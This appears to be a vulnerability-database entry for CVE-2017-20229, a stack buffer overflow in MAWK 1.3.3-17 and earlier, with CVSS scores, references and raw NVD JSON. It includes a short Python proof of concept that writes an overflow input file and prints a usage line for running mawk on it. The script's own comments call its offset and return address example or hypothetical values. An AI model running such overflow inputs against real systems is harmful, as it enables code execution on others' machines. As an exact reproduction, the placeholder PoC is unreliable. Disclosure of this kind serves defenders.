CVE-2017-20229

Description

MAWK 1.3.3-17 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting inadequate boundary checks on user-supplied input. Attackers can craft malicious input that overflows the stack buffer and execute a return-oriented programming chain to spawn a shell with application privileges.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:invisible-island:mawk:*:*:*:*:*:*:*:* - VULNERABLE

MAWK <= 1.3.3-17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys
import os

# PoC for CVE-2017-20229 (MAWK Stack Buffer Overflow)
# This script generates a malicious input to trigger the crash.

def generate_poc():
    # Offset to overwrite the instruction pointer (Example value)
    offset = 1024
    
    # Filling the buffer with 'A's to cause overflow
    # In a real exploit scenario, this would contain ROP gadgets and shellcode
    junk = b"A" * offset
    
    # Hypothetical return address to control EIP/RIP
    # This address varies based on the OS and binary version
    ret_addr = b"\xaf\x11\x40\x00" 
    
    payload = junk + ret_addr
    
    print("[*] Generating malicious input file 'exploit.txt'...")
    try:
        with open("exploit.txt", "wb") as f:
            f.write(payload)
        print("[+] File created successfully.")
        print("[*] Usage: ./mawk -f exploit.txt")
    except IOError as e:
        print(f"[-] Error creating file: {e}")

if __name__ == "__main__":
    generate_poc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20229
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20229
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20229/
[4] VulDB https://vuldb.com/cve/CVE-2017-20229
[5] https://www.exploit-db.com/exploits/42357
[6] https://www.vulncheck.com/advisories/mawk-17-stack-based-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20229", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:02.400", "lastModified": "2026-04-02T19:19:06.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MAWK 1.3.3-17 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting inadequate boundary checks on user-supplied input. Attackers can craft malicious input that overflows the stack buffer and execute a return-oriented programming chain to spawn a shell with application privileges."}, {"lang": "es", "value": "MAWK 1.3.3-17 y versiones anteriores contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a los atacantes ejecutar código arbitrario al explotar comprobaciones de límites inadecuadas en la entrada proporcionada por el usuario. Los atacantes pueden crear una entrada maliciosa que desborda el búfer de pila y ejecutar una cadena de programación orientada a retorno para generar un shell con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invisible-island:mawk:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.3-17", "matchCriteriaId": "D2CD043D-B1AA-4C92-BFD0-00D461AB42A4"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/42357", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/mawk-17-stack-based-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}